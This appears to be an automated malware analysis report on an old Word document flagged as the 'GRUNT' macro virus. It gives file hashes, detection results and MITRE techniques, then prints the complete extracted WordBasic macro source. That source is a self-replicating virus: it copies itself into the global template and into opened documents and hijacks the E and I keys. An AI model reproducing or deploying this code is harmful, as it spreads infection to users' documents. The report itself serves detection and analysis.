Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29bf0cb53481f0e4…

MALICIOUS

Office (OLE)

Size: 32.0 KB
Created: 2001-12-08 05:32:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 0ffbbf5ab5011a4453a60c1012642f2c
SHA-1: 645a968f0428a15ba5623876eb5884daec2a21bc
SHA-256: 29bf0cb53481f0e457f9d18486ae7d3a8207960a7b2391d7c43a5d99af1338e0
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic macros, as indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The macro code attempts to copy itself to the global macros and potentially establish persistence. The embedded document body text explicitly identifies itself as the 'GRUNT Virus' from 1996, which suggests historical malware or a variant of it.

Heuristics 3

  • ClamAV: Doc.Trojan.NJ-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.NJ-1
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3418 bytes
SHA-256: 8f93148da57b65c21b0a0410c9df2f6a361e3452a019147292590e49152684a8
Detection
ClamAV: Doc.Trojan.NJ-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "XxGRUNTxX2"

Public Sub MAIN()
Dim VM1$
Dim VM2$
Dim NJ$
Dim F$
Dim A$
On Error GoTo -1: On Error GoTo Finish

WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=1
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=1

VM1$ = WordBasic.[WindowName$]() + ":XxGRUNTxX1"
VM2$ = WordBasic.[WindowName$]() + ":XxGRUNTxX2"

NJ$ = WordBasic.[MacroFileName$]("XxGRUNTxX1")
F$ = WordBasic.[FileNameInfo$](NJ$, 5)

If VInstalled = 1 Then
    GoTo Finish
Else
    On Error Resume Next
    WordBasic.MacroCopy VM1$, "Global:XxGRUNTxX1", 1
    WordBasic.MacroCopy VM2$, "Global:XxGRUNTxX2", 1
    WordBasic.FileSaveAll 1, 1
End If

Finish:
A$ = WordBasic.[FileName$]()
If A$ = "" Then
    GoTo Finito
Else
    WordBasic.Insert "i"
End If

Finito:
If WordBasic.Month(WordBasic.Now()) = 5 And WordBasic.Day(WordBasic.Now()) = 9 Then
    WordBasic.Call "Payload"
Else
    GoTo EndOne
End If

EndOne:
End Sub

Private Function VInstalled()
Dim i
    VInstalled = 0
    If WordBasic.CountMacros(0) > 0 Then
        For i = 1 To WordBasic.CountMacros(0)
            If WordBasic.[MacroName$](i, 0) = "XxGRUNTxX1" Then
                VInstalled = 1
            End If
        Next i
    End If
End Function

Attribute VB_Name = "XxGRUNTxX1"

Public Sub MAIN()
Dim VM1$
Dim VM2$
Dim A$
On Error GoTo -1: On Error GoTo Finish

WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=1
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=1

VM1$ = WordBasic.[WindowName$]() + ":XxGRUNTxX1"
VM2$ = WordBasic.[WindowName$]() + ":XxGRUNTxX2"

If VInstalled = 1 Then
    GoTo Finish
Else
    On Error Resume Next
    WordBasic.FileSaveAs Format:=1
    WordBasic.MacroCopy "Global:XxGRUNTxX1", VM1$, 1
    WordBasic.MacroCopy "Global:XxGRUNTxX2", VM2$, 1
    WordBasic.FileSaveAll 1, 0
End If

Finish:
A$ = WordBasic.[FileName$]()
If A$ = "" Then
    GoTo Finito
Else
    WordBasic.Insert "e"
End If

Finito:
If WordBasic.Month(WordBasic.Now()) = 5 And WordBasic.Day(WordBasic.Now()) = 9 Then
    Payload
Else
    GoTo EndOne
End If

EndOne:
End Sub

Private Function VInstalled()
Dim i
    VInstalled = 0
    If WordBasic.CountMacros(1) > 0 Then
        For i = 1 To WordBasic.CountMacros(1)
            If WordBasic.[MacroName$](i, 1) = "XxGRUNTxX1" Then
                VInstalled = 1
            End If
        Next i
    End If
End Function

Private Sub Payload()

Rem A Virus from Nightmare Joker's Demolition Kit!


End Sub